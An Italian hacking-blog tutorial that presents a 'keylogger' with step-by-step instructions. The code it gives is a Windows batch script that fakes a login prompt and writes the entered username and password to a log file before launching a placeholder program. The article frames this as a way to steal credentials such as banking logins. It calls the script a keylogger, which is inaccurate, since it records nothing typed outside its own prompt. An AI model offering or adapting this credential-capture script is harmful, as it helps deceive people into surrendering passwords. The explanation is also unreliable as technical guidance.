Hacking

Keylogger,cosa è e come crearlo!! 2018

0

Benvenuti in questo nuovo articolo in cui vi mostreremo cosa è un Keylogger e vi mostreremo anche come crearlo!!

ATTENZIONE,TECHNO AGE NON SI ASSUME NESSUNA RESPONSABILITA’ SULL’UTILIZZO CHE FARETE TRAMITE QUESTO ARTICOLO CHE E’ STATO SCRITTO CON IL SOLO SCOPO INFORMATIVO,QUALSIASI CONSEGUENZA CAUSATA DALL’UTILIZZO DI QUESTO ARTICOLO SARA’ VOSTRA ED UNICA RESPONSABILITA’.

Cominciamo!

Cercheremo di essere il più chiari possibile in quanto per parlare del Keylogger approfonditamente ci vorrebbero articoli ed articoli.

E’ giusto chiarire anche che,un Keylogger può sia essere uno strumento hardware che uno strumento software,noi oggi,vi faremo vedere come creare uno strumento software.

Lo “scopo” di un Keylogger è molto semplice,ovvero,salvare di nascosto tutto ciò che viene digitato sulla tastiera del computer infettato,il tutto per rubare informazioni personali come dati di accesso o codici bancari.

Per questo venivano e vengono anche oggi utilizzati da Cia ed altre agenzie governative per incastrare sospetti hacker che commettono reati.

Pensate che,uno studente del Regno Unito fu arrestato per aver alzato i voti in 5 dei suoi esami,come aveva fatto? Semplice,dopo aver installato un Keylogger in un computer della scuola riuscì a rubare le credenziali di accesso per poi modificare i voti online!!

Ma come posso creare un Keylogger?

Beh,molto semplice,vi mostreremo anche come testarlo in modo da essere sicuri che funzioni!

1) Dobbiamo aprire il blocco note per scrivere il testo che permetterà di creare il Keylogger.

2) Copiate ed incollate il seguente testo nel blocco note:

@echo off
color a
title Login
cls
echo Perfavore inserisci il tuo username e la tua password
echo.
echo.
cd “C:Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
exit

3) Salvate il file così: logs.bat nel vostro desktop.
4) Sempre nel vostro desktop crea una cartella chiamata logs
5) Taglia (click destro sull’icona della cartella) e poi incolla la cartella appena creata nel drive C
6) Adesso ritorna al desktop e avvia il file logs.bat che hai creato prima,si aprirà il CMD,e ti chiederà di inserire il tuo Username e Password,tu inserisci prima il tuo username e premi invio,poi ti chiederà la password e premi invio.
7) Il CMD si chiuderà automaticamente e nel desktop vedrai un nuovo file di testo chiamato LOG,aprilo e vedrai le credenziali che poco fa avevi appena inserito!!

Semplice vero?

Grazie ancora per aver letto uno dei nostri articoli,ci vediamo alla prossima!!

Techno Age Admin

Mariana’s Web,è questa la parte più profonda e misteriosa del Deep Web?

Previous article

Tor: Cos’è e a cosa serve? 2018

Next article

Comments

Rispondi

Login/Sign up